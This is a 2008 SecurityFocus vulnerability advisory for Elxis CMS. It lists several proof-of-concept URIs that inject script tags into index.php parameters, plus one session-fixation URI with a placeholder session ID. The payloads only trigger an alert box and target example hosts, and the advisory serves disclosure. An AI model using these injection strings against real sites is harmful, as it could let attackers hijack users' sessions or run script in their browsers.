Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Elxis CMS 'index.php' Multiple Cross Site Scripting and Session Fixation Vulnerabilities

To exploit these issues an attacker entices an unsuspecting user into following a malicious URI.

The following example URIs are available for the cross-site scripting issues:

http://www.example.net/index.php?>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>
http://www.example.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>

The following example URI is available for the session-fixation attack:

http://www.site.com/?PHPSESSID=[session_fixation]







 

Privacy Statement
Copyright 2008, SecurityFocus